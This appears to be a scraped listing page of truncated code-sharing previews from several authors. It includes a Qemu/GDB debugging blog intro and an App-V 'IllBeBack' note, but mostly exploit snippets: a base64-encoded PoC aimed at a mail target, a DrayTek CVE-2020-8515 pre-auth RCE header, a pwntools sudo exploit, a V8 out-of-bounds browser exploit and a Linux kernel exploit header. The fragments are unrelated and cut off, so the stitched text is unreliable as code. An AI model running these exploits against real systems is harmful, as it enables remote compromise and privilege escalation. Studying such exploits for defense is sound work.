Theldus

The only proper way to debug 16-bit code on Qemu+GDB

(or nearly so...)

GDB is undeniably an extremely versatile debugger, with the ability to add breakpoints, watchpoints, dump memory, registers, and the source code (along with its corresponding assembly). These features make it the perfect Swiss Army knife for most programmers. In addition to that, the possibility of implementing a 'GDB Stub' and automatically supporting GDB in your application makes it an almost universal debugger for a variety of tasks.

Qemu, like other virtual machines (such as 86Box), also implements debugging via GDB Stub, which enormously facilitates the development of bootloaders, operating systems, and more. The support for 32-bit and 64-bit code is quite good, and I have never seen any complaints about it. However, for 16-bit/real mode...

Is debugging in 16-bit/real mode really that bad?

If you have ever tried to debug 16-bit code on Qemu, you know how painful it can be:

1. GDB thinks your code is

infernalheaven

from netfilterqueue import NetfilterQueue
import traceback
import subprocess
import signal
import dpkt
import socket

raw_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(3))
raw_socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2**30)

EvanMcBroom

IllBeBack - An Undocumented Function

Microsoft purchased the software Softricity SoftGrid in 2006 and renamed it to Microsoft Application Virtualization, or App-V for short. Windows shipped with several libraries in System32 and SysWOW64 to support App-V.

AppVTerminator.dll

One App-V library stands out from all the rest because it only has one exported function named IllBeBack... That's right! A library signed by Microsoft, with Terminator in the name, that only has a single callable function named IllBeBack.

v-p-b

aW1wb3J0IHJlcXVlc3RzCmZyb20gdXJsbGliMy5leGNlcHRpb25zIGltcG9ydCBJbnNlY3VyZVJl
cXVlc3RXYXJuaW5nCmltcG9ydCByYW5kb20KaW1wb3J0IHN0cmluZwppbXBvcnQgc3lzCgoKZGVm
IGlkX2dlbmVyYXRvcihzaXplPTYsIGNoYXJzPXN0cmluZy5hc2NpaV9sb3dlcmNhc2UgKyBzdHJp
bmcuZGlnaXRzKToKICAgIHJldHVybiAnJy5qb2luKHJhbmRvbS5jaG9pY2UoY2hhcnMpIGZvciBf
IGluIHJhbmdlKHNpemUpKQoKaWYgbGVuKHN5cy5hcmd2KSA8IDI6CglwcmludCgiVXNhZ2U6IHB5
dGhvbiBQb0MucHkgPHRhcmdldD4gPGVtYWlsPiIpCglwcmludCgiRXhhbXBsZTogcHl0aG9uIFBv
Qy5weSBtYWlsLmV2aWwuY29ycCBoYXhvckBldmlsLmNvcnAiKQoJZXhpdCgpCnJlcXVlc3RzLnBh
Y2thZ2VzLnVybGxpYjMuZGlzYWJsZV93YXJuaW5ncyhjYXRlZ29yeT1JbnNlY3VyZVJlcXVlc3RX
YXJuaW5nKQp0YXJnZXQgPSBzeXMuYXJndlsxXQplbWFpbCA9IHN5cy5hcmd2WzJdCnJhbmRvbV9u
YW1lID0gaWRfZ2VuZXJhdG9yKDMpICsgIi5qcyIKdXNlcl9hZ2VudCA9ICJNb3ppbGxhLzUuMCAo

SwitHak

Ripple20, set of vulnerabilities inside Treck / KASAGO IP Stacks

General

• Ripple20 is the codename to a set of 19 vulnerabilities discovered by the cybersecurity team JSOF.
• These vulnerabilities are inside an IP stack, selled under two different names (Treck TCP/IP for U.S market Kasago TCP/IP, for Asia market. -These two stacks were bought and used under privated-labeled by several softwares companies, some known names are: GHnetv2, Kwiknet, Quadnet.
• But there's more, these stacks were also integrated, sometimes with modifications, inside several RTOS (real-time operating system).
• Last, some of the vulnerabilities, depending the device operating system, configuration or location can have greater or lower CVSS score.
• My advice is for companies to ask their suppliers if they use one of this stack and assess the risk following their company risk policy.
• This will not be an easy set of vulnerabilities to patch, sadly.

0xsha

package main


/*
CVE-2020-8515: DrayTek pre-auth remote root RCE

Mon Mar 30 2020 -  0xsha.io


Affected:

asdqwe3124

<?php

//php gd-gif.php image.gif gd-image.gif 

$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
imagedestroy($gif);
?>

wbowling

#!/usr/bin/python

import os
import pty

from pwn import process, sleep, write, read, listen, p64

"""
From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401:
} else if (c == sudo_term_kill) {

wbowling

// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;

var arr1 = [1.1];
var arr2 = [Date];

var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();

wbowling

// 4.4.0-116-generic #140-Ubuntu SMP
#define _GNU_SOURCE

#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>